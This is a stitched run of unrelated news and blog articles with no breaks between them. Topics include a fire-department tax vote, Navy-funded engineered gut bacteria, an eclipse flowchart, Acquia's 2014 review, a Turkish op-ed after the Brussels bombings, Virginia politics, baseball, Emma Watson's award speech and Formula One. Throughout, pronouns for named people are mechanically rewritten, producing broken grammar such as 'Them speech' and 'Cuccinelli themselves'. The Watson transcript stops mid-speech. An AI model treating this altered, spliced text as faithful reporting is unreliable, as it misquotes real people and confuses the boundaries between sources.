While voters said no Tuesday to streetcars , they said yes to renewal of the quarter-cent sales tax for the Fire Department . The citywide ballot measure passed , 65 percent to 35 percent .
The tax , which has been in effect since 2002 , raises about $ 18.5 million per year , more than 10 percent of the department 's $ 140 million budget . Supporters said renewal for another 20 years would allow the department to retain about 100 firefighters whose salaries are paid with the tax , plus do upgrades to fire trucks and other fleet vehicles .
“ We 're very happy that the voters supported the fire department once again , as we know this is not additional revenue coming into the fire department , ” said Fire Chief Paul Berardi . “ We are pleased to better now be able to plan for the future . ”
Berardi and Michael Cambiano , president of Local 42 of the International Association of firefighters , agreed a top priority will be replacing fire apparatus and ambulances as needed .
Cambiano said the vote will “ allow us to enact our strategic plan and take the Fire Deparment to the next level. ” They said that means deploying firefighters and emergency medical responders in underserved areas at the north and south ends of the city .
In their lab at Rice University synthetic biologist Jeff Tabor is creating a kind of Lilliputian naval academy . The midshipmen are so small they ca n't be seen with the naked eye . But they 're part of a vital mission to protect U.S. naval forces from internal enemies , ranging from metabolic disorders to anxiety and depression .
In 2014 Tabor received a three-year grant from the U.S. Office of Naval Research ( ONR ) to genetically modify a harmless species of Escherichia coli bacteria normally found in the human gut . The goal is to create an edible probiotic organism that can hone in on developing disease and stave it off , even before symptoms take hold . They have recently succeeded in engineering E. coli with sensors that can detect the presence of chemicals signaling disease—at least in the mouse gut .
Their ultimate aim is to design “ a precision gut bacterium that manipulates the intestinal environment in humans to keep it healthy , ” they say . This involves rewiring the genes of E. coli to transform the cells into predictable and reliable microbial medics loaded with engineered genetic circuits that can sense specific chemical disturbances and fire off a battery of molecules to neutralize them . The cells would live only a short time in the gut , perhaps six hours or so , “ just long enough to do their job , ” Tabor says . Then they would die naturally or self-destruct .
Tabor 's initial target : obesity and related metabolic issues . “ We want to use a genetically engineered E. coli cell to sense the chemicals that signal gut disturbances linked with obesity , ” Tabor says , “ and then deliver beneficial molecules to prevent weight gain . ”
Tabor 's work represents the fruitful collision of two hot fields : synthetic biology , the engineering of microorganisms to make useful products ; and microbiomics , the study of the microbes living on and inside humans and other animals , collectively known as the microbiome . `` There 's great potential in this area because there are so many widespread chronic diseases associated with the gut , '' says Pamela Silver of the Wyss Institute for Biologically Inspired Engineering at Harvard University , which published report of the first synthetic engineered gut microbe in 2014 .
The 100 trillion bacterial cells that reside in our guts play a major role in nearly every aspect of human biology—digesting food , guiding the immune system , even dictating mental health by sending signals to the brain that affect mood , cognition and behavior . It 's not surprising , then , that disruption of these gut microbial communities can lead to disease , including obesity and related problems .
Tabor 's project is part of a larger program on the microbiome funded by the ONR to help U.S. naval forces be more robust in the face of stressors—changes in diet or environment , fearful situations , sleep loss or disrupted circadian rhythms from shifting time zones or living in a submarine . “ We 're interested in how gut microbiota respond to these stresses , ” says Linda Chrisey , program officer in the ONR 's Warfighter Protection and Application Division . “ Are they contributing to the host 's response ? If so , can we tweak the microbiota to insulate the host from the stress ? ”
Tabor chose to focus on obesity “ because we already know a lot about it at the molecular level , ” they say , “ so it 's a good model to test the concept. ” Our microbiota act like a kind of metabolic ‘ organ , ' that affects calorie and nutrient absorption , manages energy balance and controls body weight . ( Scientists are n't sure what shapes microbiomic composition . Increasing evidence suggests that it 's determined before birth and has to do with genetics , maternal diet and mode of delivery . ) It 's clear that some bacteria make molecules that disrupt the balance within , causing obesity and other disorders . Studies have shown that the gut bacteria of healthy people churn out compounds that strengthen the intestinal wall but those of obese people make compounds that weaken the wall . This allows bacterial molecules to pass into the bloodstream where they do not belong , triggering an immune response . The resulting chronic inflammation is correlated with a laundry list of ailments , from inflammatory bowel disease to mental health disorders , such as anxiety and depression .
It 's still early in the game , but Tabor has already isolated several sensors , reengineered them and put them into a single E. coli bacterium . They have fed the modified cells to mice and shown that the sensors have been activated inside the mouse gut , suggesting they have detected the target chemicals .
Tabor plans to have a single E. coli bacterium carry up to a dozen sensors so it can detect multiple signals at one time for a more accurate diagnosis . Ultimately , they plan to engineer these cells to produce drugs when and where they 're called for—highly targeted antibiotics designed to bind with and deactivate those bacterial chemicals that might otherwise leak into the blood from the intestine—thereby preventing the changes that lead to obesity , inflammation and associated ills . Delivering these drugs to the exact tissue in the body where they 're needed and nowhere else would both decrease side effects and increase efficacy .
However , `` these are genetically engineered organisms , so there will be a long debate about them , '' Silver says . `` We 'll have to weigh the risks versus the potential benefits . But we 're working to develop ways to make these organisms inherently safe . And I think the concern over risks will be neutralized by the benefits , especially for people who suffer from chronic disease . ”
So far , Tabor has altered only mouse microbiota . But , they say , “ it 's hard to imagine a future where we are n't diagnosing and treating , possibly curing , many diseases in humans by manipulating gut bacteria in this way—diabetes , autoimmune disorders , cancer , neurological disorders , ” and , yes , weight issues .
In fact , the Navy may find creative ways to deploy these synthetic probiotics not just to avoid obesity and its attendant problems but to quickly shift body weight and metabolism as necessary , Tabor suggests . “ Imagine you have a team of marines going from a temperate environment , say , at sea level , to a really cold environment , like up on top of a mountain , in a short period of time . You want them to be able to put on some fat quickly to be more robust in the cold environment . ”
The solution ? A dose of yogurt laced with synthetic probiotics that change warfighters ' metabolism to increase fat for a couple of weeks—and after that another dose to take it off when they return to sea level .
Start here !
Are you in the path of totality ?
Heck yes !
No
But do you have a nice view of the sky ?
Yep , I 'm cool like that ( brushes off shoulder ) .
No , there 's a stupid building in the way .
You 're set ! Now…
How does a vacation sound ?
Sounds good !
Not a good time .
Find a viewing party near you . Listings by state are here and more events listed here .
Yeah !
Solar glasses : Get a pair of these . Bonus points for 1980s retro .
How about a night out ?
Into camping ?
Know what time the eclipse will happen and for how long from your vantage point . NASA has great information here .
Nah , I 'll stay in .
My tent 's already at the door !
Not this time .
Do you have a solar telescope ?
No .
Yes !
Hurry ! Public camping spaces are limited , though federal land agencies are creating more options . In Oregon , the Forest Service has opened up more campsites through- out the state . The Bureau of Land Management has a list of potential viewing areas . And the National Park Service has a list of places to watch the eclipse .
Are clouds going to ruin your view ? Check this historical cloud cover map , which provides average August cloud cover on the eclipse track . On the days leading up to the eclipse , check this eclipse cloud forecaster .
Create a pin-hole viewer that will project the eclipse no matter where you are . NASA has some great tips . Or — view the eclipse with something you probably already have at home : a colander .
Phew ! All good .
Gulp . Clouds are rollin ' in !
Sweet !
Seems weird . I do n't want to .
Beware ! Expect two- to four-hour traffic delays within the eclipse path . Allow your- self extra travel time — unless you do n't mind watching the eclipse from the back of your truck or hood of your car .
Check out photos of the eclipse : # HCNsolareclipse Livestream the eclipse from your computer , thanks to NASA .
[ Rendering via Alamo Drafthouse ]
Austin-based movie theater and more Alamo Drafthouse has just announced plans for a third DFW location to be located in Las Colinas , at the upcoming $ 165M Music Factory entertainment complex . The complex will also feature an 8,000 seat amphitheaters , a bowling alley and multiple outdoor stages , plus retail , restaurant and office space .
The first Alamo Drafthouse in DFW opened in Richardson last summer , and plans were recently announced for a second outpost in The Cedars , slated to open mid-2015 . The Las Colinas location will feature a second-floor lounge with food , drinks and a patio . Groundbreaking will take place at a free outdoor event this Saturday night that will feature a screening of the original 35mm version of Raiders of the Lost Ark , plus food trucks , local beer , and appropriately on-theme whip deonstrations . The film begins at sunset and the event is BYOC ( bring your own chair ) .
· Alamo Drafthouse [ Official ]
· All Alamo Drafthouse coverage [ -EDFW- ]
As it is now a tradition for me , here is my annual Acquia retrospective , where I look back at 2014 and share what is on my mind as we start the new year . I take the time to write these retrospectives not only for you dear reader , but also for myself , because I want to keep a record of the changes we 've gone through as a company and how my personal thinking is evolving from year to year . But I also write them for you , because you might be able to learn from my experiences or from analyzing the information provided . If you would like to , you can read my previous retrospectives : 2009 , 2010 , 2011 , 2012 and 2013 .
For Acquia , 2014 was another incredible year , one where we beat our wildest expectations . We crossed the major milestone of $ 100 USD million in annual revenue , the majority of which is recurring subscription revenue . It is hard to believe that 2014 was only our sixth full year as a revenue-generating business .
We 've seen the most growth from our enterprise customers , but our number of small and medium size customers has grown too . We helped launch and host some incredible sites last year : from weather.com ( a top 20 site ) to the Emmys . Our efforts in Europe and Asia-Pacific are paying off ; our EMEA business grew substantially , and the Australian government decided to switch the entire government to Drupal and the Acquia Platform .
We hired 233 people in 2014 and ended the year with 575 employees . About 25 % of our employees work from home . The other 75 % work from offices around the world ; Burlington MA ( US ) , Portland OR ( US ) , Washington DC ( US ) , Paris ( France ) , Reading ( United Kingdom ) , Ghent ( Belgium ) , Singapore , Delhi ( India ) , Brisbane ( Australia ) and Sydney ( Australia ) . About 75 % of our employees are based in the United States . Despite our fast growth rate in staff , recruiting remains a key challenge ; it 's hard to hire as fast as we do and maintain the high bar we 've set for ourselves in terms of talent and commitment .
We raised venture funding twice in 2014 : a $ 50MM series F round led by New Enterprise Associates ( NEA ) followed by Amazon investing an undisclosed amount of money in our business . It 's not like Tom Erickson and I enjoy raising money , but building and expanding a sales and marketing team is notoriously difficult and requires big investments . At the same time , we 're building and supporting the development of multiple products in parallel . Most companies only build one product . We 're going after a big dream to become the preferred platform for what has been called the `` pivot point of many enterprise tech stacks '' — the technologies that permit organizations to deliver on the promises of exceptional digital customer experiences from an agile , open , resilient platform . We are also competing against behemoths . We ca n't show up to a gunfight with a knife , so to speak .
Building a digital platform for the enterprise
Digital has changed everything , and more and more organizations need or want to transform into digital-first businesses to stay in step with the preferences of their customers . Furthermore , technology innovations keep occurring at an ever faster and more disruptive pace . No organization is immune to the forces of digital disruption . At Acquia , we help our customers by providing a complete technology platform and the support necessary to support their digital initiatives . The Acquia Platform consists of tools and support for building and managing dynamic digital experiences . It includes Acquia Cloud , which helps developers deliver complex applications at scale , and Acquia Lift , our digital engagement services for bringing greater context to highly personalized experiences . Let me give you an update on each of the major components .
Drupal tools and support
Drupal gives organizations the ability to deliver a unified digital experience that includes mobile delivery , social and commerce . Great inefficiencies exist in most organizations that use a variety of different , disconnected systems to achieve those three essentials . They are tired of having to tie things together ; content is important , social is important , commerce is important but connecting all these systems seamlessly and integrating them with preferred applications and legacy systems leads to massive inefficiencies . Companies want to do things well , and more often than not , Drupal allows them to do it better , more nimbly and in a far more integrated framework .
In 2010 , we laid out our product vision and predicted more and more organizations would start to standardize on Drupal . Running 20 different content management systems on 20 different technology stacks is both an expensive and unnecessary burden . We 've seen more and more large organizations re-platform most of their sites to Drupal and the Acquia Platform . They realize they do n't need multiple content management systems for different sites . Great examples are Warner Music and Interscope Records , who have hundreds of sites on Drupal across the organization , resulting in significant cost savings and efficiency improvements . The success of our Acquia Cloud Site Factory solution has been gratifying to witness . According to a research study by Forrester Consulting , which we released late last year , ACSF is delivering a 944 % return on investment to its adopters .
After many years of discussion and debate in the Drupal community , we launched the Acquia Certification Program in March 2014 . So far , 546 Drupal developers from more than 45 countries have earned certification . The exams focus on real world experience , and the predominant comments we 've heard this past year are that the exams are tough but fair . Acquia delivered six times the amount of training in 2014 compared to the previous year , and demand shows no sign of slowing .
Last , but definitely not least , is Drupal 8 . We contributed significantly to Drupal 8 and helped it to achieve beta status ; of the 513 critical Drupal 8 bugs fixed in 2014 , Acquia 's Office of the CTO helped fix 282 of them . We also funded work on the Drupal Module Upgrader to automate much of the work required to port modules from Drupal 7 to Drupal 8 .
Acquia Cloud
Drupal alone is n't enough for organizations to succeed in this digital-first world . In addition to adopting Drupal , the cloud continues to enable organizations to save time and money on infrastructure management so they can focus on managing websites more efficiently and bringing them to market faster . Acquia customers such as GRAMMY.com have come to depend on the Acquia Cloud to provide them with the kind of rugged , secure scale that ensures when the world 's attention is focused on their sites , they will thrive . On a monthly basis , we 're now serving more than 33 billion Apaches hits , almost 5 billion Drupal bootstraps ( requests handled by Drupal instead of one of different caching layers or the web server directly ) , 9 petabytes of data transferred ( excluding instance to instance traffic ) , and logging 13 billion Drupal watchdog log lines . We added many new features to Acquia Cloud in 2014 , including log streaming , self-service diagnosis tools , support for teams and permissions , two-factor authentication , new dashboards , improved security with support for Virtual Private Networks ( VPNs ) , an API for Acquia Cloud , and more .
Acquia Lift
As powerful as the Drupal/Acquia Cloud combination may be , our customers demand far more from their digital properties , focusing more and more on optimizing them to fully deliver the best possible experience to each individual user . Great digital experiences have always been personal ; today they have to become contextual , intuitively knowing each user and dynamically responding to each user 's personal preference from device to location to history with the organization . After two years of development and the acquisition of TruCentric , we launched Acquia Lift in 2014 .
It 's surprising how many organizations are n't implementing any form of personalization today . Even the most basic level of user segmentation and targeting allows organizations to better serve their visitors and can translate into significant growth and competitive differentiation . Advanced organizations have a single , well-integrated view of the customer to optimize both the experience and the lifetime value of that customer , in a consistent fashion across all of their digital touchpoints . Personalization not only leads to better business results , customers have come to expect it and if they do n't find it , they 'll go elsewhere to get it . Acquia Lift enables organizations to leverage data from multiple sources in order to serve people with relevant content and commerce based on intent , locations and interests . I believe that Acquia Lift has tremendous opportunity and that it will grow to be a significant business in and of itself .
While our key areas of investment in 2014 were Acquia Cloud and Acquia Lift , we did a lot more . Our Mollom service blocked more than 7.8 billion spam messages with an error rate of only 0.01 % . We continue to invest in commerce ; we helped launch the new Puma website leveraging our Demandware connector and continue to invest and focus on the integration of content and commerce . Overall , the design and user experience of our products has improved a lot , but it is still an area for us to work on . Expect us to focus more heavily on user experience in 2015 .
The results of all our efforts around the launch of the Acquia Platform have not gone unnoticed . In October , Acquia was identified as a Leader in the 2014 Gartner Magic Quadrant for Web Content Management .
The wind is blowing in the right direction
I 'm very optimistic about Acquia 's future in 2015 . I believe we 've steered the company to be positioned at the right place at the right time . As more organizations are shifting to becoming digital-first businesses they want to build digital experiences that are more pervasive , more contextual , more targeted , more integrated , and last but not least , more secure .
The consolidation from many individual point solutions to one platform is gaining momentum , although re-platforming is usually a long process . Organizations want the unified or integrated experience that Drupal has to offer , as well as the flexibility of Open Source . It is still time consuming and challenging to create quality content , and I believe there is plenty of opportunity for us and our partners to help with that going forward .
Without a doubt , organizations want to better understand their customers and use data-driven decisions to drive growth . Data is becoming the new product . The opportunity this creates in commerce is massive .
Cloud computing and Software-as-a-Service ( SaaS ) continues to be on the rise . Cloud is top of mind and the transition away from on-premise solutions is accelerating even as the arguments around security and privacy issues in the cloud continue to be raised . While there is a certain amount of emotion , and sometimes politics , people are beginning to realize that the cloud is usually more secure and more robust against cyber-attacks than traditional on-premise systems .
The promise of Drupal 8 , arguably the most significant advance in the evolution of the Drupal software , has me very excited . It is shaping up to be a great release , and I 'm confident it will further secure Drupal 's reputation among developers , designers , agencies and site managers as the most flexible , powerful content management solution available .
All of this is not to say 2015 will be easy . This is an incredibly exciting and fast-changing space in the world of technology . Acquia is growing in an incredibly fast-paced , dynamic sector and we realize our mission is to help our customers understand how to think ahead to ever more innovation and change . Simplifying our overall messaging and defining ourselves around the Acquia Platform is a significant first step .
Of course , none of this success would be possible without the support of our customers , partners , the Drupal community , the Acquia team , and our many friends . Thank you for your support in 2014 , and I look forward to working with you to find out what 2015 will bring !
Belgium has officially become a terror hub at the heart of Europe .
Just months ago , Belgian citizens were shooting innocent people and blowing themselves up in Paris . Days later , the world realized that the Belgian authorities had not only failed to track the movements of extremists coming back from Syria but also allowed Brussels to turn into a safe haven for terrorists .
At this point , there is no doubt that Belgium must be kicked out of the European Union . European leaders have no choice but to build a wall around the country to prevent terrorists from sneaking into Fortress Europe and placing civilian lives at risk .
Unfair ?
Biased ?
Offensive ?
Welcome to the club . This is an all-too-familiar mix of emotions for many Turkish readers , who are sick and tired of watching self-proclaimed experts talk nonsense about their native country .
For the record , we did not actually mean what we said . We know better than to blame the victim for a crime against humanity .
Insensitive and careless , European leaders have turned a blind eye to terrorists in their midst provided that they were kind enough to direct their anger at non-European societies . Just days ago , the PKK - an armed group that the European Union considers a terrorist organization - was able to fly its banners outside the EU building in Brussels . This spectacle was not only offensive to thousands of people who lost their loved ones to the group 's violent campaign since 1984 , but also showed that European leaders did not really care about the terror attacks in Turkey - they were , after all , taking place elsewhere .
But we know better than to hold grudges . Today is about solidarity and getting people 's lives back on track .
Now that we have your attention , though , our point is :
This morning , millions of Ankara residents can relate to the concerns of people in the Belgian capital better than anyone else . A week ago , they lost family members and loved ones in a senseless act of violence . Having directly walked back home after work , many people know what it means to feel unsafe in familiar areas .
People experience the exact same emotions when their living space is under attack - regardless of their language , religion or gender . This mutual bond should serve to help the world understand that we can not keep playing favorites among terrorists . Unless we unite now - not just pay lip service to joint action but actually get to work - we will keep burying the dead in Ankara , Brussels , Paris , London , Madrid , Berlin and Rome . One by one , Europe 's capitals will set the stage for some criminal 's masterwork .
Bombs will keep going off until the Syrian civil war comes to an end - or , at the very least , is brought under control . Regardless of their country of citizenship , terrorists are implementing projects developed by extremists fighting in Syria . The fact that Syrian leader Bashar Assad , a man who perpetrated a chemical attack on live television among other things , carefully forces the international community to choose between themselves and DAESH does not mean anything either .
Europe is being haunted by the monster it helped create . By implementing a failed refugee policy and showing nothing but indifference toward crimes against humanity committed by the regime , European leaders not only turned Syria into a conflict zone but also pave the way to senseless crimes being committed on European soil .
Tuesday 's terror attacks targeted Brussels , but sent shock waves through Europe and elsewhere . We already know that European authorities will beef up security by conducting blanket surveillance , declaring a state of emergency and imposing checkpoints . The answer , however , is not to install more security cameras at transportation hubs . To combat a cross-national network of deranged fanatics willing to kill innocent civilians just to make a point , Europe needs to conduct joint action against the Syria-based terrorism .
Republican nominee for governor Ken Cuccinelli , right , is joined onstage with the other members of the ticket , including E. W. Jacksonon , second from left . ( Steve Helber/AP )
A nominating convention helped put Virginia Attorney General Ken Cuccinelli on the gubernatorial ballot . It might also sink their chance to win .
Nominating conventions turn out the most committed and partisan members of the party . Lt. Gov . Bill Bolling , a more moderate Republican , dropped out of the race for governor because they knew the convention would favor Cuccinelli . And at the convention this past weekend , Cuccinelli won -- but so did the Rev . E.W . Jackson , lieutenant governor candidate and a fiery conservative . Within hours , news organizations had dug up scores of controversial comments made by Jackson about abortion , homosexuality and the Democratic party . Among other things , they have compared Planned Parenthood to the Ku Klux Klan and referred to gays in the military as `` sexually twisted . ''
All that could be a problem for Cuccinelli , who is tacking to the middle in their campaign against Democrat Terry McAuliffe . Their focus is on the economy , not the social conservatism that fueled their own rise in GOP politics . Jackson 's place on the GOP ticket gives fuel to Democrats who aim to paint Cuccinelli as an extremist .
`` We 're in a deep [ expletive ] , '' said one Virginia Republican strategist . `` The only good news is that the Democrats have Terry McAuliffe . It 's the only thing keeping us glued to a chance of victory . ''
McAuliffe , a former Democratic National Committee chairperson , has faced questions about their leadership of an electric car company and some unflattering quotes from their own memoir .
Asked if Jackson was trouble , another senior Virginia Republican responded , `` Oh . My . God . Yes . '' The danger , the Republican said , is that Jackson will bring Democrats to the polls who might otherwise stay home . `` You just do n't want one candidate to rile up the base of the other side . That 's what you 're trying to avoid . ''
In Virginia , the candidates for governor and lieutenant governor run separately . Ticket-splitting happens . * In 2005 , current Lt. Gov . Bill Bolling ( R ) beat former state Sen. Leslie Byrne ( D ) and served with Democratic Gov . Tim Kaine . Byrne was an unabashedly liberal candidate ; Kaine ran as a moderate .
Another relevant case is 1993 , when conservative homeschooling activist Michael Farris ran for lieutenant governor on the Republican ticket . They lost to Democrat Don Beyer by a wide margin even as Republican George Allen won the gubernatorial race and Republican Jim Gilmore the race for attorney general .
And Cuccinelli themselves was elected as attorney general on the same ticket as Bolling , despite very different political styles .
In an interview with The Post the day after the convention , Cuccinelli indicated that they would not be answering for Jackson 's controversial beliefs .
“ I am just not going to defend my running mates ' statements at every turn , ” they said . “ They 've got to explain those themselves . Part of this process is just letting Virginia voters get comfortable with us , on an individual basis , personally . ”
After the convention , the Republican candidates embarked on a traditional group tour of the state . Beyond that , it wo n't be surprising if we rarely see Cuccinelli campaigning with Jackson after that . But if they put too much distance between themselves and Jackson , Cuccinelli risks offending their conservative base .
There 's something else that gives the Virginia GOP hope — what 's going on in Washington . In off-year races , Virginia voters have a tendency to vote for the party that lost the last national election , a trend that 's held since 1977 and gives Cuccinelli better odds . If President Obama 's approval rating deteriorates over the next six months , Virginia voters might vote to send a signal to the White House and leave social issues aside . The impassioned speech that helped propel Jackson to victory was largely about the federal government , not the state .
`` You can not look at this race without looking at the national atmosphere as well , '' said former Virginia Republican member of congress Tom Davis . `` This race will probably be 70 percent national and 30 percent state . ''
Rosalind S. Helderman contributed to this report .
* This post originally said that ticket-splitting was rare , because a governor and lieutenant governor from separate parties have only been elected twice in the past three decades . But there have been six split tickets since 1969 .
by
On Sunday , Travis Wood shut out the Pirates . Monday , they pinch hit in the 13th inning in Miami , doubled and the Cubs had won two straight .
Travis Wood should pinch hit , because they can hit . When they pitch , their bat gives the Cubs a theoretical American League lineup , with a .276/.323/.552/2 HR slash line that might drop them into the seven hole for the Rays or Red Sox . “ Actually , ” says one NL executive , “ he should probably bat sixth for the Cubs. ” Hey , in managing the Orioles in 1958 , Paul Richards batted Jack Harshman third , sixth , seventh and eight ; Harshman hit six homers that season with a .757 OPS , 21 as a pitcher for their career .
In this era when matchup mania forces managers into carrying 12 pitchers and having barren benches , pitchers as players are worth a great deal more than a simple one out , breaking ball lefthander paid to keep a Josh Hamilton , Joey Votto or David Ortiz from swinging the bat the last time through the order . Remember Catfish Hunter on the 1971 Athletics . They threw 247 innings . Their earned run average was good , 2.96 , not great in the non-DH era , but part of the reason they won 21 games was that they hit .350 with a .362 on base and .408 slug with an OPS+ of 120 . Oh yes . And did n't commit an error .
Travis Wood is a good pitcher . He 's not going to light up an analytics life , but they can hit . They are lefthanded and controls the running game . They are an outstanding fielder who can make bunting difficult . “ He does a lot of things that go into helping their team win , ” says Cubs General Manager Jed Hoyer .
It helped converted third baseman and sinkerballer Bob Lemon get to the Hall of Fame ; they had 37 home runs as a pitcher , one fewer than Wes Ferrell . Warren Spahn hit 35 , Red Ruffing 34 as a pitcher , Earl Wilson 35 ; back in 1966 , when the Orioles were headed to a world championship and the Red Sox were headed to ninth place , my brother Ned drove to Baltimore 's Memorial Stadium and saw Earl Wilson win a 2-1 game in which they hit a walk-off home run in the tenth inning . Don Drysdale hit 29 . Carlos Zambrano hit 24 . Rick Wise hit 15 , including two while throwing a no-hitter .
You 're not going to see career numbers like that today , but it seems that baseball is concerned about Pitch FX and ( my favorite site ) Brooks Baseball , physical breakdowns that they forget pitchers are athletes who should be treated as baseball players , not supporting actors . “ I absolutely believe that , ” says Angels GM Jerry DiPoto . “ I know , I was a pitcher , but maybe the more they train as players and as athletes , the better they 'll pitch , and I mean pitch. ” “ Sometimes it takes time for pitchers to figure out how to pitch hitters , but Dallas Keuchel is the classic example of a guy who was a good hitter in college , understood hitting and knew how hitters think , ” says one NL scout . “ He 's figured things out . ”
Zack Greinke ? They are this generation 's Greg Maddux , brilliant in dissecting hitters , a tremendous fielder , good hitter . Andrew Cashner is a superbly athletic fielder , hitter . Tim Hudson was an All-American outfielder at Auburn . Joe Kelly was a college outfielder . Mike Hampton could do absolutely everything . Sean Doolittle was a tremendous first baseman at Virginia and a high draft pick as a hitter . Mike Leake and Henderson Alvarez could probably play in the infield . Scouts who watched Brad Lincoln in the Cape League in 2005 , when they finished second to Evan Longoria in homers , wonder what would have happened had they hit every day in the minors and kept with the routine that made them the fourth pick in the 2006 draft .
In contrast , one of the hottest pitching prospects in the Boston organization , lefthander Brian Johnson , led the University of Florida in homers their draft year . The question was raised whether the Red Sox would allow them to take BP , even if they only pinch hits on occasion . “ It 's something we 'll discuss , ” says assistant GM Mike Hazen . “ If that 's part of their baseball routine , we 'd have to give it a thought . They were a two-way player in college who understands hitting . Maybe that will help them with pitching . ”
When Tom Burgmeier and Bill Campbell were with the Red Sox in the late seventies , they had prolonged killer pepper games every day on the road . Both were very good fielders . Both loved to play baseball , not just shag flies and throw sides in the bullpen . Burgmeier always maintained that those games helped their hand-eye coordination , concentrated on their joy of the game , helped their instincts and fielding and use different athletic muscles . “ I think there 's a lot to that , ” says Padres GM Josh Byrnes . “ When I played in college , pepper was one of those things we loved doing . There 's no question it benefits their games as athletes , and we want pitchers to be athletic . It 's also part of making the game fun . Most pitchers were really good players in high school . They love to play . Why should n't they be allowed to play when they 're at the park , ”
“ I give a lot of credit to Bo Porter for using Tony Sipp as an outfielder , ” says one NL GM . “ It 's a creative use of the roster . Sipp probably loves it. ” Of course . Sipp played the outfield at Clemson more than they pitched .
“ Someone will probably say Sipp could get hurt , ” says another GM . Puh-leaze . Derek Holland blew out their knee walking their dog down the stairs . Bobby Ojeda once missed half a season when they slipped in their hotel shower .
The best pitchers are athletes who repeat their deliveries . After Game One of the 2009 ALCS , in which CC Sabathia dominated the Angels , the Yankee Stadium ground crew called me to the mound the next day to show me what could only have been Sabathia 's landing hole , lefthanded , long stride . It was one hole . Sabathia is such a remarkable athlete that even though they ( then ) weighed 300 pounds and had a hitch in their delivery , they had landed in the same spot for more than 100 pitches .
Sometimes it seems that teams draft pitchers , then treat them like an AKC puppy brought home from a breeder , trained in a cage and walks on leashes…
Let them be baseball players , like Greinke or Cashner , Alvarez or Travis Wood . It 's not a bad thing to throw a shutout one day , then hit a game-winning double the next . Wood did not get hurt . He 'll be back on the mound Saturday night .
In the wake of their triumphant address to the UN in September , Emma Watson delivered a speech of a different order at an awards ceremony in Los Angeles on October 30 .
In accepting their prize for British Artist of the Year at the Britannia Awards , the actor spoke about the death of their hamster , Millie , on the set of the first Harry Potter film . They recalled how the set decorators on the film had fashioned the creature a tiny coffin , before dedicating their award to the late rodent .
Them speech was received warmly by the audience at the event , which is hosted annually by Bafta LA to celebrate the achievements of film professionals in the US , the UK and beyond .
The full transcript :
`` I 'm especially honoured to be receiving this award ... er ... from the Bafta ... LA ... because the British film industry has n't just been a workplace for me , it 's been the place I 've grown up , it 's been a surrogate family , really . And a sweet but slightly morbid example of this , is when on the first Harry Potter film , my on-set hamster , Millie , had a heart attack and did n't quite make it ... So the set decorators built a small , mahogany-sized hamster coffin . And it had a velvet lining and a silver plaque on the front which had Millie 's name engraved on it .
Any Green Bay Packers player who used Twitter to rip the NFL following Green Bay 's controversial loss to Seattle on Monday ( and there were many ) will not be fined by the NFL , according to a report .
From CBS Chicago :
The Green Bay Press Gazette 's Rob Demovsky tweeted Wednesday that NFL spokesperson Greg Aiello said : `` We are not looking into that . ''
Usually , the NFL will crack down on any unsavory actions by their employees . Hell , players get fined for wearing sleeves of the wrong color . But they have n't yet fined any players for talking shit about the shield on Twitter .
Advertisement
The NBA and MLB have more draconian Twitter policies ( See : J.R. Smith , Chris Perez ) , but the NFL is n't as restrictive . Their social media rules only limit players from tweeting 90 minutes before and after a game , or any time during it . In this case , the league chose to not set a precedent for what can be said on Twitter , one of the few smart decisions it has made this season .
Report : Packers Players Wo n't Be Fined For Ripping NFL On Twitter [ CBS Chicago ]
What Are the NFL 's Rules About Social Media ? [ Yahoo ! ]
Fernando Alonso says 'nothing has changed ' at Ferrari since they left
Fernando Alonso believes the size of Mercedes ' win in the Spanish GP has vindicated their decision to move to McLaren , saying “ nothing has changed ” at Ferrari .
After five frustrating seasons with the Scuderia , Alonso quit Ferrari at the end of last season to reunite with McLaren ahead of their remarriage to Honda . The new alliance has yet to score a point in five races this term but Alonso is adamant that they were right to gamble on the new partnership coming good after ‘ losing faith ' with Ferrari .
“ I am very happy with the move , ” the two-time title winner told Sky Sports News HQ . “ I was in the Ferrari last year half a minute , a minute behind Mercedes and on Sunday they were 43 seconds behind in Barcelona . Nothing has changed – and that is one of the reasons why l moved . I saw nothing change for five years and l did n't want a sixth or seventh . ”
The tenor of Alonso 's remarks echo the comments of former Ferrari president Luca di Montezemolo who opined last week that , rather than progressing relative to Mercedes , the team were only scoring podiums this season because their rivals had fallen backwards .
`` I honestly think they [ Ferrari ] have been a bit lucky : This year , apart from Mercedes , they have no other rivals , '' Di Montezemolo said .
`` Williams has not improved and Red Bull has imploded and McLaren are in crisis . In short , Ferrari starts every race with a podium in its pocket . But luck is useless if you do n't take advantage of it . ''
Fernando Alonso greets their former Ferrari colleague Massimo Rivola
McLaren , though , have bristled at the notion that they are in crisis , with the team publicly insistent that their early-season struggles were to be expected while Honda adapt to F1 's new turbo era and progress is being made .
After both of the team 's cars reached Q2 in qualifying in Barcelona before struggling on race day , Alonso , whose stoicism in the face of McLaren-Honda 's adversity has been exemplary , is confident that the team will make a breakthrough into the points in two weeks ' time around the mean streets of F1 's showpiece event .
“ l am very fully motivated . If we can be competitive soon it will taste sweet because we have started from zero and I think we will get points in Monaco , ” they predicted . “ From now on we will be on the limit for tenth places for the next two or three races . Hopefully after Canada and Austria we will be more secure – seventh l hope . That is the target .
`` In the final part of the championship , even if l am optimistic , hopefully we will be close to the podium . ”
According to Alonso , speaking at a Johnnie Walker sponsorship event promoting safe driving , McLaren 's race simulations predicted they were on course to finish ninth in Sunday 's race at the Circuit de Catalunya before a freak occurrences resulted in their brakes spectacularly overheating
“ It was very unlucky , ” said Alonso . “ If l tried it one million times l would n't get a tear off from a visor into a brake duct again .
“ But maybe it is better to have these things now when we are uncompetitive rather than when we are fighting for the podium . ”
AUBURN HILLS -- The first thing to know about Detroit Pistons point guard Will Bynum is that they do n't lack confidence . Put them with a center who never lived in an English-speaking country before and they turn translator . Put them with a point guard who could send them packing for another team this summer and all they want to do is play alongside the guy .
The Pistons went into NBA All-Star break with a 96-85 win Wednesday over the Washington Wizards and their backup point guard , now challenged by the newcomer Jose Calderon 's incredible acumen at the position , was instrumental in taking over their position down the stretch , with Calderon moving to shooting guard .
It did n't seem strange to Bynum , who after 13 lead changes and the last of 13 ties scored the next six points , then kicked to Calderon for a corner 3-pointer to make it 85-76 , as the Pistons seized control in the final five minutes .
`` It 's kind of what the league is doing right now , '' Bynum said of closing the game alongside Calderon . `` It creates matchup problems for the other team . ''
As for the prospect of having a newcomer at their position who earns an eight-figure salary , Bynum , a free agent after this season , said that does n't enter their thinking .
`` I 'm never concerned about any competition or anything like that , '' they said . `` I invite that . It 's been here since I 've been here . Never complained . I 'm going to get after it every day and make them better and better every single day . ''
